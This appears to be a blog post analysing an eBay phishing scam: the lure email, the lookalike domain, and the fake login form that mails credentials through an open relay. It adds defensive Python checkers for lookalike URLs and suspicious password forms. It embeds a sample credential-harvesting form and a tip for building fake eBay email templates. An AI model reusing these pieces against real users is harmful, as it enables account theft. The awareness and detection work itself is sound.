Anatomy of Ebay Password Theft

Question:
How does one steal another's ebay password?
Answer:
Ask them for it!

If someone else thinks that you're ebay, you can ask them for the password, and they will give it to you.

This is the basic idea behind most phishing scams designed to take your ebay password.

A phisher sends out fraudulent emails that look identical to legitimate ebay emails, hoping that you believe they are actually from Ebay.

In the attack demonstrated here, an email disguised as a "Question about an item" lures the recipient to a fake Ebay login page; the user name and password entered there are emailed straight to the phisher.

Here's one such suspect email:
It seems like a legitimate message from ebay to the common user.

It's very easy to create your own template for fake ebay emails. One can simply use the "Ask seller a question" feature, and select the option to have the question emailed to you. Voila, you can be stealing ebay passwords in minutes!

Figures 1 & 2: Ebay Question (the suspect email, two screenshots)

If you place your mouse over the fake links, the real URL appears in the status bar on the bottom of your browser:

The phisher registered the domain "signin-ebay-isapidll2-updatecom.com" to further confuse the user. Since someone may see "signin-ebay" and equate that to the real URL, they may think this email is legitimate.

Legitimate Ebay Login URL (top) vs Fake URL (bottom)
https://signin.ebay.com/ws/eBayISAPI.dll?...
http://signin-ebay-isapidll2-updatecom.com...
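The hover check above works because the status bar shows the real hostname, and a hostname is only eBay's if it sits under eBay's domain, not merely because "ebay" appears somewhere in it. The following is an added example (not code from the original post) of that check done programmatically, the way a mail filter or browser extension would do it: it parses the link, compares the hostname on whole DNS labels against a legitimate domain, and separately flags a brand name embedded in an unrelated host and a plain-http sign-in link. The legitimate domain `ebay.com` is assumed from the real URL shown above; the two extra test links are constructed.

```python
from urllib.parse import urlsplit

# Assumption for this example: legitimate sign-in pages live under ebay.com
# (the post shows https://signin.ebay.com/...). Any host not under this domain
# is not eBay, however closely it resembles it.
LEGITIMATE_DOMAINS = {"ebay.com"}
BRAND = "ebay"


def is_under_legitimate_domain(hostname: str, domains=LEGITIMATE_DOMAINS) -> bool:
    """True only if hostname is a legitimate domain or a subdomain of one.

    The comparison is on whole DNS labels, so 'signin.ebay.com' matches but
    'signin-ebay-isapidll2-updatecom.com' and 'signin.ebay.com.evil.example'
    do not: the brand name inside a label, or inside a longer suffix, proves nothing.
    """
    hostname = hostname.lower().rstrip(".")
    return any(hostname == d or hostname.endswith("." + d) for d in domains)


def assess_login_link(url: str) -> dict:
    """Classify a link that claims to lead to a sign-in page.

    verdict: 'legitimate', 'lookalike', 'other' or 'invalid'
    reasons: findings suitable for a warning banner or a log line
    """
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if not host:
        return {"verdict": "invalid", "reasons": ["no hostname in URL"]}

    reasons = []
    if is_under_legitimate_domain(host):
        verdict = "legitimate"
    elif BRAND in host:
        # The hallmark of the domain in this post: the brand name is present,
        # but the registered domain is something else entirely.
        verdict = "lookalike"
        reasons.append(f"'{BRAND}' appears in host {host!r}, which is not under a legitimate domain")
    else:
        verdict = "other"
        reasons.append(f"host {host!r} is unrelated to the brand")

    if parts.scheme.lower() != "https":
        reasons.append(f"scheme is {parts.scheme!r}; a sign-in page should use https")
    return {"verdict": verdict, "reasons": reasons}


if __name__ == "__main__":
    # The two links from the post, plus two constructed variants of the same trick.
    for link in (
        "https://signin.ebay.com/ws/eBayISAPI.dll?SignIn",
        "http://signin-ebay-isapidll2-updatecom.com/",
        "https://signin.ebay.com.evil.example/",  # constructed: brand as a subdomain of another domain
        "https://signin.ebay.com@evil.example/",  # constructed: text before '@' is user info, not the host
    ):
        result = assess_login_link(link)
        print(f"{result['verdict']:<11} {link}")
        for reason in result["reasons"]:
            print("    -", reason)
```

Anything other than `legitimate` should be treated as a suspect sign-in link. Note that the check deliberately uses the parsed hostname rather than a substring search over the whole URL, which is why the user-info variant (`signin.ebay.com@evil.example`) is classified by its real host, `evil.example`.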

Figure: Ebay Question Real URL (the status bar revealing the true link target)

When the unsuspecting user clicks on the "Respond Now" link found in the email, they are taken to a page strikingly similar to the ebay login. There are a lot of red flags that would be raised for the educated internet user, but the common user would think it looks like the ebay login page, so it must be the ebay login page.

Here I've pulled apart a few striking aspects of the page:


Figures: Ebay Fake Login Page, and the same page annotated

Now lets compare the fake page to the legitimate ebay login page:


Figures: Real Login vs Fake Login, and the same comparison annotated

Dissecting the actual HTML code for the page gives more insight into how this scam actually works.

The "FORM" on the page where you enter your data directs to his page:
"jmailer.starware.com/cgi/mailform.dll"

It is labeled in green as Facilitator.

"What is this?" one may ask. Well, this is what's called an OPEN SMTP RELAY, AND THEY ARE DANGEROUS. This is a "program" that someone posted on the website "starware.com" that allows users to send emails from FORMS. Since they are "OPEN RELAYS", it means that anyone can send it data, and it will email it out. When I say these are dangerous, you should understand why. THEY ALLOW PEOPLE TO STEAL PASSWORDS! Someone was lazy when administrating the "starware.com" website, and this caused ebay users to have their passwords stolen.

The other values are variables that the mailform.dll program accepts. There is an email address that the ebay password information is sent to, as well as that email's subject. In this case the subject is "stol"... as in stolEN INFORMATION. The goto variable is the page that the user is kicked to after they submit their information. In this case it is an ebay page, so the user may think that they actually signed in: one more layer of deception to confuse users.
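Everything the two paragraphs above describe is visible in the form's HTML: the `action` points at a form-to-mail script on a host that is not the page's own, and hidden fields carry the recipient address, the subject and the `goto` redirect. The following is an added example (not code from the original post or from ebay) of auditing a page for exactly that pattern: it collects every form that contains a password field and flags an off-host `action`, a hidden value that is an email address, and a hidden value that is a redirect URL. The sample HTML is constructed to match the post's description; the handler URL `jmailer.starware.com/cgi/mailform.dll` and the subject `stol` are from the post, while the hidden field names, the recipient address and the redirect target are assumed placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class FormCollector(HTMLParser):
    """Collect every <form> on a page with its action and its <input> fields."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # attributes without a value become ""
        if tag == "form":
            self._current = {"action": a.get("action", ""), "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append({
                "type": (a.get("type") or "text").lower(),
                "name": a.get("name", ""),
                "value": a.get("value", ""),
            })

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def audit_login_forms(page_url: str, html: str) -> list:
    """Return findings for every form on the page that collects a password."""
    collector = FormCollector()
    collector.feed(html)
    page_host = (urlsplit(page_url).hostname or "").lower()
    findings = []
    for form in collector.forms:
        if not any(i["type"] == "password" for i in form["inputs"]):
            continue  # not a credential form, ignore it
        # Relative actions are resolved against the page, so a same-origin form has no finding here.
        action_host = (urlsplit(urljoin(page_url, form["action"])).hostname or "").lower()
        if action_host != page_host:
            findings.append(f"password form posts to {action_host!r}, not to the page host {page_host!r}")
        for i in form["inputs"]:
            if i["type"] != "hidden":
                continue
            if "@" in i["value"]:
                findings.append(f"hidden field {i['name']!r} holds an email address: the submission is mailed, not processed")
            elif i["value"].lower().startswith(("http://", "https://")):
                findings.append(f"hidden field {i['name']!r} sends the user on to {i['value']!r} after submit")
    return findings


# Constructed sample modelled on the post's description of the fake page.
# Field names, the recipient address and the goto target are assumed placeholders.
FAKE_PAGE_URL = "http://signin-ebay-isapidll2-updatecom.com/signin.html"
FAKE_PAGE_HTML = """
<form method="post" action="http://jmailer.starware.com/cgi/mailform.dll">
  <input type="hidden" name="recipient" value="PHISHER-MAILBOX@example.invalid">
  <input type="hidden" name="subject" value="stol">
  <input type="hidden" name="goto" value="https://www.ebay.com/">
  User ID: <input type="text" name="userid">
  Password: <input type="password" name="pass">
  <input type="submit" value="Sign In">
</form>
"""

# Constructed sample of a same-origin sign-in form, for comparison.
REAL_PAGE_URL = "https://signin.ebay.com/ws/eBayISAPI.dll?SignIn"
REAL_PAGE_HTML = """
<form method="post" action="/ws/eBayISAPI.dll">
  User ID: <input type="text" name="userid">
  Password: <input type="password" name="pass">
  <input type="submit" value="Sign In">
</form>
"""

if __name__ == "__main__":
    for url, page in ((FAKE_PAGE_URL, FAKE_PAGE_HTML), (REAL_PAGE_URL, REAL_PAGE_HTML)):
        findings = audit_login_forms(url, page)
        print(url, "->", "no findings" if not findings else "")
        for finding in findings:
            print("    -", finding)
```

Run against the constructed fake page this reports three findings (the off-host `action`, the recipient field, the `goto` redirect) and nothing for the same-origin form. The same audit is a cheap thing to run over any page that asks for a password, since a credential form that hands the submission to a third-party mail script has no legitimate reason to exist.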

Figures: Ebay Fake Login Code, and the same code annotated

Getting your password is the easy part; the hard part is making money with this information.

The phisher will log into your ebay account and post 24 hour auctions for high-dollar items, at low prices. This ensures that people will bid on them, and they can easily get $500-700 per item. Such as here:

Figure: items I'm not selling (auctions posted from the hijacked account)

Notice they are items which would normally sell for much MORE than the asking price, and they end in less than 24 hours. These auctions are more likely to sell than if they place the item up at regular prices. It's quick cash for the phisher.

Needless to say, I didn't follow the scam any further, as I would have risked actual money at that point.

I hope this was informative, and that it encourages everyone to be wary of ANY correspondence they receive from ebay. Another thing to note is that Firefox successfully identified the fake login page as "Suspected Web Forgery".

Figure: Firefox Suspected Web Forgery

Just for kicks here's the auction that the initial email was regarding. It was a legitimate auction, to further help the authenticity of the fake correspondence.

Figure: Real Page Honda 2002 CR